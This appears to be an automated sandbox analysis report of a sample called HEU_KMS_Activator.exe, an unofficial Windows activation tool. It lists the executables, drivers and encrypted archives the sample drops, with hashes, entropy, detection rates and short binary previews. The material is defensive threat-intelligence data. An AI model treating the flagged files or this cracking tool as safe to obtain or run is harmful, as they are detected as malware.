Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:data
Category:dropped
Size (bytes):49120
Entropy (8bit):0.0017331682157558962
Encrypted:false
SSDEEP:3:Ztt:T
MD5:0392ADA071EB68355BED625D8F9695F3
SHA1:777253141235B6C6AC92E17E297A1482E82252CC
SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
Malicious:false
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):5054976
Entropy (8bit):7.916798998306011
Encrypted:false
SSDEEP:98304:R8sjkqfcfKquIxKbcC+Ad44X8AFp5IbW7zLulUqp/6X0A2UU:3jgfXuIQb7+5A8AFp6bMKUy/zUU
MD5:7CD8B711BE93FF8858B7DC753C4065CA
SHA1:358EAD5466FD6F67545CD77D87D541235449558F
SHA-256:4159BA56C793D9A4EA76A1F364534E9AF97BA28E750104697C10D6D97F6C2CFA
SHA-512:99A03912DE71E832DE24F16F225C38325AD4D5358F31286FE9E27E8FACE8590AAC2AC29ABE3D49833154E02EF4612E6DCF6444D7E397BAEAE3D43D9E6FF6B897
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 66%
Process:C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):921936
Entropy (8bit):6.5211606037200776
Encrypted:false
SSDEEP:24576:l4dtfxkWTy0xymlC80KNWxDqnYHSVLR+sAsx:2TyKaAGqnYHS/+sAsx
MD5:1474BD3EDA2E087560754241A0B92991
SHA1:E1E66D856800DBB5EF5BF9C8E937B6514B9F02D7
SHA-256:C83E6B96EE3AA1A580157547EAE88D112D2202D710218F2ED496F7FE3D861ABC
SHA-512:CA2CBC155CEF666C46E6E4C07CC2E9A61BD15CEF8F8F1902D06C6178A1968487FC2AD78E018621A09836755C524215AA9FCB6E62D52B210DEEC10162EDCC9B7F
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 87%
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):921936
Entropy (8bit):6.5211606037200776
Encrypted:false
SSDEEP:24576:l4dtfxkWTy0xymlC80KNWxDqnYHSVLR+sAsx:2TyKaAGqnYHS/+sAsx
MD5:1474BD3EDA2E087560754241A0B92991
SHA1:E1E66D856800DBB5EF5BF9C8E937B6514B9F02D7
SHA-256:C83E6B96EE3AA1A580157547EAE88D112D2202D710218F2ED496F7FE3D861ABC
SHA-512:CA2CBC155CEF666C46E6E4C07CC2E9A61BD15CEF8F8F1902D06C6178A1968487FC2AD78E018621A09836755C524215AA9FCB6E62D52B210DEEC10162EDCC9B7F
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 87%
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:GIF image data, version 89a, 273 x 273
Category:dropped
Size (bytes):97281
Entropy (8bit):7.82329967382233
Encrypted:false
SSDEEP:1536:O1l8tBhsJe/wPTWxjzm70L/QulTl4UmSjbDXf9bgr5Dm:Ov8uYGT4jqC/5diuXDX165q
MD5:95CCF61C6AB8C98CD9C6F33AB8D4108F
SHA1:4CDA9E213DA3B4D8C87D3C4FCE103544E0FBCD6A
SHA-256:E91A4F80813094EF53A0408D91679E7757E4F71C4ACC9E942E8ACA630BE0DF45
SHA-512:62851F1C1EC3DB6F3382E5C376B8C69C05EA223983A4929E676A5524767465DE42EE75D3E78730750DFE8E231E937CCFA4242A937D14012B581F2F6EE5353370
Malicious:false
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):1807018
Entropy (8bit):7.999894560057019
Encrypted:true
SSDEEP:49152:AvAFxpIyAuLjnXQsP2snIbrYpnvnjo8yOgICCvi:AvAFLIGLz5PtnIfYFnjoG0
MD5:E95E0A57CAF3E24C190CD303AABABA7A
SHA1:25C8A267FE760BAF9B638D39AF73806034B6B3E8
SHA-256:CE54BD0CA93B73BBBFC2AFBB2C6F7159D83A3A5CAEB92146D850765A1B6A9DA0
SHA-512:033E112700C8C2BB4E4D68852AD959608B7BE4FA46FABDE41C05FFEA69982A8F440684AA93F0A686D65FE5E4394B7D5D3DFD1924D44B2ABBF6DA0256B9B49E9C
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):862741
Entropy (8bit):7.999021184950542
Encrypted:true
SSDEEP:24576:c2/RWRiVf6KUw/KacmqZooybsSViudCbEio:cZiUKzEZAsSzaS
MD5:F7229B58B678638D30DE2AA2E2B23D08
SHA1:37C374C09921C968853D220A3288E087F3DBB0AF
SHA-256:25E1EE2D65C00543E5855299CE396F52C411D8E8E49A8FAB4D90A2B21E65711C
SHA-512:2DC4BAE503EFD6A1E56C09431524AB9207E1A63AAF4E63A912A389F3831895E3794AC1F632EB353036AA477521DFFFC6F0FF78CA79938F29FAB68FEA9625C4F3
Malicious:false
Preview:7z..'....L...)......$............eC..].&..p.........../D.|.../._..z.-~A..\..*~kHy54......<.....=......6......! o..- 6Y..x..iC.#.@.LN....U...........%...[@...../.4.$...._......F;s%.P.|F.C..y@.."...H..jau..C....i..o.<D..[r.9y9.W..4......k..oNG..?X...q.r....g.QaZ...6..=%... ..).z..[.......fUx...mY-0.U.;6.....4..K.N...a...6...L...........[]v..e.i....r.T;.....c.R0..D.X_...a.:......2.r.E.!.....c.....!....U........4.............aIn...(.c.Z.6....:s...*...o...s.^).....D...#..%.].<C....G.<3.;.W.2..je.k.....]b.Q.|.C.B.qw.I.......=..|U..s......PH..u.{...FM..X..8....T/.E[...p..g.9......;.4.k.U..........Y5.^.0E..0'..yr..20{N.)...9E...._...:{..PL..).a.......B.|....b.i}9L..c..*..Fh.....>. ..$k.).a..e.}......../.....H5.$\r...O.y.[...}....P.!A.T}.l.A..>m.:....)Z*..2.3(..3.....l.p..%L7K......L.i[...4O.....{$..A.^.'.....BP....#.D...'.C.\..xx}..>O..T..9..2......{.........J.2..(..~J..X..W............0...kkR.-.t3q.h.4.d.....4..zY...l~l...N....B........K..j..0.I.O
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):515101
Entropy (8bit):7.999632298329647
Encrypted:true
SSDEEP:12288:hiUueKswiHeFY4aND7fBUNJA88M4n44EZVcHv5IoeOs9iX76vMHao:D5wE4a1W488MB9Z4BI9O76v9o
MD5:10A8C081F96DC74DACA5F0BA91045B36
SHA1:F7B32E796ABE8A806F40148F2E67EA8DC09F9490
SHA-256:1E1B06B1BDA8D90232F1B96C116603001C9F56EBCF28F2790533B5825BC475DD
SHA-512:7164F5BBFD6959E1D1D2809DCD42E46499DDD680FA9C8E521E88ECDFDBCFCE49C834580FEBC775785C9431EE87063A4909034C4B474FFECEB53C8C84B1775BCF
Malicious:false
Preview:7z..'...4~..........%.........-..3..]......,..B..:(.ZgL.1.E.M..a.....k..".C.]...r.oKq.o.b....E./.b.1ge......+.Q/T......O.z...R.r......{.....i ..].{...w...MyCfo ...$.<!.... .zq...)....h..s.J..O..}... ...9......Z.R#.Wq.......&1&.Tk.=.j.....,&.*..<.uz.Bh.2/W..d...B.|..Q.._D.V.f.q...RC..a..h..8...,....q..&~........m..k:,...;...*..i4.....S#.m+.s.I..o.az..I.b....;..+.....<.....Q.....eTs/..`..h.4.....8...........iIk.?.k.......n.i.....A.......e.dA=...T9.{...."P..J.w?e...a.g..D..x..e....Sa...X.0Z;Q..Q..K}...=.)&....b.[..$Xfw.=;...%.P.k....v.....+..?h..4pU.>.(e..L.S.x..F..3.PY.$..@.,d...5@.X.....aB... ........nt...yyC..w.h.l.......BM.._.....5..2....7...>.....i.....X6`....m[.Z.H$%..pS.)..8..f^..r".9....l.....r~.....)......6r.{...&G.........H......~.....}.YT..i.H....1.&5..n...'..K..3.)|J|>|.av.a....`xqv....1p]............U..s.G.<."..p|....QD6..'.._E(.h..H...L...i.}..m..r..........N..............t..49..........'Cj"....P.........O..V:\WHi....#G.S
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):475105
Entropy (8bit):7.999623658383902
Encrypted:true
SSDEEP:12288:0BdMAMRRQzWvIyoCnF7EhprE88oWL3cdtbaDB0M714PuMOmIACEh1cdu:SdpMPY2JF7En8fMzqb4PuM7IyMu
MD5:9AE06E4DB00F08CD6A1F77FDCC645427
SHA1:376C01217ABB3D8D4F72DE4FDED8DCF2C0CB4367
SHA-256:BABBA1B9FB634D804CD66944A3E97EB4BE36AB34AC56C05D007014EC73E9386E
SHA-512:457E01C333CEFF74830B7B021D782F363CA751831BAA066D9D5AFCF9F2D389580178EE18DC052D1855C413FA7A05BC68BBE74D1F0D4DA620BA5D84AFB4E55511
Malicious:false
Preview:7z..'.....z..?......%.......0.f-..5..].w......3.a`.....f...'D.$.."8..S..D...w...g...*..m.D.?....N.8.K..e....n9Q........>.....Z....B.t..0....Dx-...8x.E..V.l...a....{Zu7.U?..@w..S..H.^..aW.[.`be.C?.*8.....?....B<..p.t....H.!.I..49.]..(....4#.c...{.m`:vSB.f(..f...)f..8...7}.w...R.A)t. _i.D...0...MRFJ......R...i..?Sa...S.\..<...K.b...&d.O.4.V.=..t.x...J..(>..w...X.L..A;@..|..[...`(.j}.}.7...M.p..n?..X....@.....].........q.........q'.ld._...{./u;...H.......c~79v..jr=.z........dI:?.....(........S...~.h..f.>L...Y......9.f.&d..G..S.F%.....g........1..R...7/....,.=J.}.f...?.v..D..T..3.Q.5*..`b..us0<h....= ...W...P.`$XI......$.=...E.a.Z.hlv...=/LbB.5...Vo.........0..r..}@.}..%YV1<.7y.L.).FR....U.S.h.q...^..:h.....o.VY...g;.'.Qp.n.O.c...gP..._...]G.\?0.n.$z..WC...1.'.T:./..w....9..I......[e....q.s4S....D_../0"`.X.z.(-~.X.u.g...Q.9...W..-"..A..}.W..O..G...=..?Cg.o9F.8....Sj$b/8..}.5t......<...n.U0..\.Kh.........u..V./!p..IRy(......Pp.7..N..Uu.m8.Y*.l.(.
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:data
Category:dropped
Size (bytes):339052
Entropy (8bit):7.768607938890595
Encrypted:false
SSDEEP:6144:/zeZFuAYH6DdYuB9UO3HpNOe5xGCvfVTGCMRX4zBcof7ep+IcZqTPkakEwWkt:VH6BLjF7txGKfRGCMWzBcKBI2qPk+w7t
MD5:61DD537B79E9960A1075FF73CB4419EC
SHA1:6FCBF8E7E7D3850C76B90B95F014799A17ABBE6B
SHA-256:D6C0234C05D4A8CD32005E0BFBA409C32C57CA3EA271A097AF16326362F660A5
SHA-512:4EE5810DFBCDB8BE118A0E710F72575BD6CA50358CFC4B43B717C9CCF90423EF7B4E995783B8D6B1273AD427552268E3891DAA367F216A6FFC0E34F4BFAC3BBE
Malicious:false
Preview:EA06.........................Z..F@.~...!......'.!.@i...R.i....+}..a..,v.u..t.X...... ...J}NAm..,..l6.$.D..#r.Nn....&.V..v..n..(... ......A..P.3..J;....7...|.AE.8@.....@c ......].@..J.c.., ...B...S 0X.....k....ap.4..... ...<S9...@.$.A.E.....L1..8.........A.).........\.. ....!..J `-......PT @..l..e.]....6..#.....I.. .....d.., .g..S....A....|.!..\.O.....P. ..`.A....||.u...U.5..H.%....|P ...s.X....K ........?.....5|_..._0....q..@0.....$.@......$.b.....I..H?.hg.........I(..1..EG.O.T......Y.L....".U..0~.eN...U.4....@.......Ug.e.A...o.P.A.^.`....z6.h..9....._k.u.z2.p.........MT.`.T..:....^.b..o.......H......#..l".H.b.."...D+..b)[....F..bcj..M...1...&...{.../..E.]ax;/.........9.......6..P......R.z:..4....r.AS.U..+T+..ci.....l.......@*.?DwG..ch....2..`...........H ..Y.Vn.@..P.G....f.^...P,]..V..`....1M.Z..>...... .......b..&........_;.u....DH.........@*....h.P..._..t.E...D4..Pj.j..W.m5@...>.,..&......A... ..&,.(.b....,.......W..... ............P....6........u
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:data
Category:dropped
Size (bytes):8706939
Entropy (8bit):7.533667839644912
Encrypted:false
SSDEEP:196608:4wueFjgfXuIQb7+5A8AFp6bMKUy/zUUMu2Z3Sr:P2X2Z8yp6bMKUyLMu2Z3I
MD5:87C198415B33014577322AB1BDCA2DA3
SHA1:2EA7D74927F55D977C6A6747A40D1E256BDB8E32
SHA-256:D3EF7D8859FE916AB43FC1D9B6C0173E0F5DEC4ECEAAD6E00B0B2D11F95DFDD1
SHA-512:A855D265771FE5945D6D5D4BED2CD30F607ED56FC915D27288057243640C484E3C74000FC042696460FA622C70CA576800B4062963E32F225DE3AED90486525E
Malicious:false
Preview:.0......,.......,.......D!..Z....+......./.......0..................................................................................................................................................................................................................................................................................#!..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):11264
Entropy (8bit):5.567124464313517
Encrypted:false
SSDEEP:192:7DKnJZCv6VmbJQC+tFiUdK7ckD4gRXKQx+LQ2CSF:7ViJrtFRdbmXK8+PCw
MD5:00A0194C20EE912257DF53BFE258EE4A
SHA1:D7B4E319BC5119024690DC8230B9CC919B1B86B2
SHA-256:DC4DA2CCADB11099076926B02764B2B44AD8F97CD32337421A4CC21A3F5448F3
SHA-512:3B38A2C17996C3B77EBF7B858A6C37415615E756792132878D8EDDBD13CB06710B7DA0E8B58104768F8E475FC93E8B44B3B1AB6F70DDF52EDEE111AAF5EF5667
Malicious:false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j....l.9..i....l.Richm.........................PE..L.....*J...........!................0).......0...............................`......................................p2......t0..P............................P.......................................................0..X............................text...1........................... ..`.rdata.......0......."..............@..@.data...d....@.......&..............@....reloc.......P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):21
Entropy (8bit):3.403989446485262
Encrypted:false
SSDEEP:3:tRytG2v:sG2v
MD5:CB4BB3086383DD9AEFEB1763052734B6
SHA1:A4080CFB3930EDC39D7DF9C78F094AF4EE8E6DC2
SHA-256:54B01DB41FE23B8CF69BC767E00840BC2F6F3AF0595E6EE9F2EE2BC07A77D769
SHA-512:829BCEE57D6FC3961EBEED6264244F9BBCF36E9D13CA8DAACFABA1D8F08FA06D0034FCA2269C84BAE006F91F3D33139FF53EF8A8C940591A50D667B059C4A3B9
Malicious:false
Preview:2024-07-24 21:33:53..
Process:C:\Windows\_temp07242019502489\kms_x64.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):19310
Entropy (8bit):6.652783140940435
Encrypted:false
SSDEEP:384:SL8JSc9yWPiuL8JSc9EvnypCSClikYNg703Vieip+4/CC:Xb9yWPSb9EvypPkYyMVEz
MD5:25EF64A9EEE6BCE8E239CB1EF81DBFDC
SHA1:6C2373A9F4EDCFD2845FEA091B0261EA079CAABC
SHA-256:539E3818F923B698FACEBC6CA6292E106175C103F7927BFB547848CA65882041
SHA-512:873FF6B85D48EE2B6814441DDC2E05564699091E8B68C7A5D01C8379D031277946E4C9E460CCE683679EB489B8B8E17F5E0D8280EB09F5C8018596957E834FE1
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Windows\_temp07242019502489\kms_x64.exe
File Type:Composite Document File V2 Document, Cannot read section info
Category:dropped
Size (bytes):30225
Entropy (8bit):7.121515753058385
Encrypted:false
SSDEEP:384:RaYNg7ZJEisYNg7ZJFnqR3lYNg70TX0QS8WnS+O3EYiffPizJkOg:RaYyfEXYyfFsYyZQS3STEXfHizJkOg
MD5:AFFAAD632469D6C91D540548B101C4A1
SHA1:BB76D280109387339A77325B994255FE331A4AB1
SHA-256:F856BBC0802578FB83EEFBFE3AB54407BD15D5CA8AEB0ECCF382F62D9B04A040
SHA-512:37C15E23DA55F6D93CEC5858EA07FAF32094966C861893514CCD7938F02F73241D019E1B5158B7619064C5440F463F7574F0E6C2117F0E1DD0187E5AE6F527F1
Malicious:false
Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:modified
Size (bytes):5054976
Entropy (8bit):7.916798998306011
Encrypted:false
SSDEEP:98304:R8sjkqfcfKquIxKbcC+Ad44X8AFp5IbW7zLulUqp/6X0A2UU:3jgfXuIQb7+5A8AFp6bMKUy/zUU
MD5:7CD8B711BE93FF8858B7DC753C4065CA
SHA1:358EAD5466FD6F67545CD77D87D541235449558F
SHA-256:4159BA56C793D9A4EA76A1F364534E9AF97BA28E750104697C10D6D97F6C2CFA
SHA-512:99A03912DE71E832DE24F16F225C38325AD4D5358F31286FE9E27E8FACE8590AAC2AC29ABE3D49833154E02EF4612E6DCF6444D7E397BAEAE3D43D9E6FF6B897
Malicious:true
Antivirus:
  • Antivirus: Joe Sandbox ML, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 66%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...=pY].........."..........@D.....J.............@...........................M......OM...@...@.......@.....................L...|....p....@...................M.0q...+..............................pH..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc.....@..p....@.................@..@.reloc..0q....M..r....L.............@..B........................................................................................................................................................................................................................................................................................
Process:C:\Windows\SysWOW64\cmd.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):36
Entropy (8bit):4.17619062614183
Encrypted:false
SSDEEP:3:IpBt/SBXVULYc:agXul
MD5:3A8C91238F157058E6E797878AEAA998
SHA1:A5A0DF200D397BFC92A3BA715EA911F942CF5FA6
SHA-256:8DA498514E563D6667F4A5F16C4CAE5635B6A5713FE7FA41AE91EAF5A9247384
SHA-512:5380AA1B6FACFC9E2364DDBFCC5113EE92EB1D582C1420055B3CDA6673EBDD98056443F47CEC395B4452B8F474C0E3E8D7CEE13DF87980C26B452BEA3ED4118A
Malicious:false
Preview:[Temp] ..Temp=_temp07242019502489 ..
Process:C:\Windows\System32\svchost.exe
File Type:JSON data
Category:dropped
Size (bytes):55
Entropy (8bit):4.306461250274409
Encrypted:false
SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
MD5:DCA83F08D448911A14C22EBCACC5AD57
SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
Malicious:false
Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
Process:C:\Program Files\Windows Defender\MpCmdRun.exe
File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:modified
Size (bytes):2464
Entropy (8bit):3.245481458258006
Encrypted:false
SSDEEP:24:QOaqdmuF3rlg3+kWReHgHttUKlDENh+pyMySn6tUKlDENh+pyMySwwIPVxcwIPV3:FaqdF7a3+AAHdKoqKFxcxkFYt
MD5:A5EA57C079724F574E163A3284599D1F
SHA1:A2C65D683450CD01BD07CE76AA96A2FCE7B32FD6
SHA-256:3F96DD4D7231BC13AB2910BFA843702142A6EE0BFB07114E0EEFF047B43B338A
SHA-512:534E8FBE599A6760137C00A80791CE4B9D2D984C27FF98A032480F2C5E244F12B398F08F615483B89E89ACA1023C7FA81F23770A1116158740D2D8A7B6C74FF9
Malicious:false
Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. W.e.d. .. J.u.l. .. 2.4. .. 2.0.2.4. .2.0.:.2.0.:.5.3.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):278352
Entropy (8bit):6.576985388464652
Encrypted:false
SSDEEP:6144:ln6zHmUtixjU3pEeS2wzjqyt0QcCNt9uJQd5fAObyj2PBLC:lnLU0xjU3pEH2wzpduJQd5fA2PBu
MD5:99B17FCCE8D54EA90FF5C0B9EF4FCE73
SHA1:4B987A5EBE11EF75B337FAECD240E541487F6A4E
SHA-256:CB6EE43394BB13F4E5FBAD2DADB3F4D0D5C87909E89A5C1CC9A5EF6F49B64C64
SHA-512:DFC7EA925B4159BAA91931F02C41F5C66CCEBBF652E830E2DF66C30477187495B6BB5307FFDF38C6C34DB5F1BD40FED723EA76C4F86D0752634B3A219E7FAA11
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 69%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......./q..k..}k..}k..}.{.|f..}.{.|...}.{.|}..}.y.|j..}.a.|z..}.a.||..}.a.|:..}.{.|d..}k..}...}.y.|h..}.b.|h..}.b.}j..}k.}}j..}.b.|j..}Richk..}........PE..L....y._.....................P....................@..........................`.......U....@.................................|...d.... ...............,..P....0..8$......p...................@.......p...@............................................text...$........................... ..`.rdata..............................@..@.data...d...........................@....rsrc........ ......................@..@.reloc..8$...0...&..................@..B........................................................................................................................................................................................................................................................................................
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):52176
Entropy (8bit):6.168313221432706
Encrypted:false
SSDEEP:768:kzVadQ7HTk82VE9KRzr9pyOe4ExHtq6Cbf2Q+IRNJ4Z4:kOQ7zvgEHoUqNJ42
MD5:5C2BC53BF68894CD591C5C7D1E690F41
SHA1:C4DDF1F1582D708BE83B8E75CA889F78ED387055
SHA-256:F0BBE441E1C2B926CB215699690D67526E4220534703A7FC4BB9BB20479F2CC2
SHA-512:EA922918C127ABC170EAACF2429483F2300952B3124328375E48DB524625B29741738A9250DCE8DF2D889148F5E04FB73CD3ACECB9FFD5DFD44CC8531218507B
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 88%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z..p>..#>..#>..#7.7#=..#7.,#<..#e.."9..#e.."$..#e.."8..#e..";..#>..#y..#..."8..#..@#?..#..."?..#Rich>..#........................PE..d....0.T.........."......n.....................@.............................P.......o......................................................d ..P....0..........8............@..D...0t..8...........................pt...............p.. ............................text...<_.......`.................. ..h.rdata..L....p.......d..............@..H.data....s.......*...t..............@....pdata..8...........................@..HPAGE................................ ..`INIT......... ...................... ..b.rsrc........0......................@..B.reloc..D....@......................@..B................................................................................................................................................................
Process:C:\Users\user\Desktop\HEU_KMS_Activator.exe
File Type:PE32+ executable (native) x86-64, for MS Windows
Category:dropped
Size (bytes):54224
Entropy (8bit):6.160827902341627
Encrypted:false
SSDEEP:768:865Pg3db7gc9a28CXCgWmOnyX7AO7MCzsrDX8Ztqo8MoUSnS92OgZxSm:82ItbBMK9MOv5ZtawrS
MD5:26153A4FAA0B3573E4BD461C008059FB
SHA1:8B74A646C4300E257E5FDE076C7E3067CD090D60
SHA-256:D48727E1C1550937470D32022762B924DD945457C7CE8962F65B5DE77D3180CA
SHA-512:2104D0580F2E65F7F3D1657702D8B530685FC05121F28297147E04F6FA2025E273C4AC6FB0774160489EB963675A444FC487D4C029325A1C29BD52F89D4DC7B8
Malicious:true
Antivirus:
  • Antivirus: Avira, Detection: 100%
  • Antivirus: ReversingLabs, Detection: 50%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.BZx.,.x.,.x.,.q...{.,.q...z.,.#./.|.,.#.(.k.,.#.)...,.#.-.}.,.x.-.=.,..(...,....y.,.Richx.,.................PE..d....nXT.........."..........N.................@.............................0......^.....`A................................................d...P............................ ..X.......8...........................................................................text...V........................... ..h.rdata..............................@..H.data...\4..........................@....pdata..............................@..HINIT....8........................... ..b.reloc..X.... ......................@..B................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:PE32 executable (console) Intel 80386, for MS Windows
Category:dropped
Size (bytes):587776
Entropy (8bit):6.439962628647099
Encrypted:false
SSDEEP:12288:myyKdVnyNhXCV4EkP7AIfzNXZ0b5NrnkcAqIV0A1caRI:mKvyNhXCV4E8BXAfrnkcAqU0A
MD5:42BADC1D2F03A8B1E4875740D3D49336
SHA1:CEE178DA1FB05F99AF7A3547093122893BD1EB46
SHA-256:C136B1467D669A725478A6110EBAAAB3CB88A3D389DFA688E06173C066B76FCF
SHA-512:6BC519A7368EE6BD8C8F69F2D634DD18799B4CA31FBC284D2580BA625F3A88B6A52D2BC17BEA0E75E63CA11C10356C47EE00C2C500294ABCB5141424FC5DC71C
Malicious:false
Antivirus:
  • Antivirus: ReversingLabs, Detection: 0%
Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.rR9p..9p..9p..Bl..;p...l.. p...V..[p...xC.8p..9p...p...xA.>p...V...p..V....p..V...;p...v..8p..Rich9p..................PE..L....S.L............................L.............@.........................................................................\...P.......(...............................................................................P............................text............................... ..`.rdata..............................@..@.data............l..................@....sxdata.............................@....rsrc...(...........................@..@................................................................................................................................................................................................................................................................................................................
Process:C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe
File Type:7-zip archive data, version 0.4
Category:dropped
Size (bytes):475105
Entropy (8bit):7.999623658383902
Encrypted:true
SSDEEP:12288:0BdMAMRRQzWvIyoCnF7EhprE88oWL3cdtbaDB0M714PuMOmIACEh1cdu:SdpMPY2JF7En8fMzqb4PuM7IyMu
MD5:9AE06E4DB00F08CD6A1F77FDCC645427
SHA1:376C01217ABB3D8D4F72DE4FDED8DCF2C0CB4367
SHA-256:BABBA1B9FB634D804CD66944A3E97EB4BE36AB34AC56C05D007014EC73E9386E
SHA-512:457E01C333CEFF74830B7B021D782F363CA751831BAA066D9D5AFCF9F2D389580178EE18DC052D1855C413FA7A05BC68BBE74D1F0D4DA620BA5D84AFB4E55511
Malicious:false
